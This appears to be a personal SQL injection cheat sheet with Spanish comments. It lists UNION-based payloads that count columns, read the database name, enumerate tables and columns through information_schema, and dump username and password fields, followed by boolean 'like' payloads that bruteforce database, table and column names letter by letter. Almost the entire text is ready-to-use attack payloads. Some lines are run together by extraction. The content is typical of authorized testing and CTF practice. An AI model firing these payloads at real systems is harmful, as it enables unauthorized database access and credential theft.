💾SQLi
Manual Dump
' UNION SELECT 1,2,3--+uwu '# buscando numero de columnas
' UNION SELECT 1,2,database()--+uwu # DB name
' UNION SELECT 1,2,table_name FROM information_schema.tables WHERE table_schema = <'database-name'>--+uwu # tablas
' UNION SELECT 1,2,column_name FROM information_schema.columns WHERE table_name = <'table-name'>--+uwu # columnas
' UNION SELECT 1,username,password FROM <'table-name'>--+uwu # dumpadmin123' UNION SELECT 1;-- #'# buscando numero de columnas
admin123' UNION SELECT 1,2,3;--
admin123' UNION SELECT 1,2,3 where database() like 's%';-- # bruteforce nombre db
admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = <'db-name'> and table_name like 'a%';-- # bruteforce nombre tabla
admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = <'db-name'> and table_name=<'tabla-name'>;-- # check tabla
admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=<'db-name'> and TABLE_NAME=<'tabla-name'> and COLUMN_NAME like 'a%'; # bruteforce columnaÚltima actualización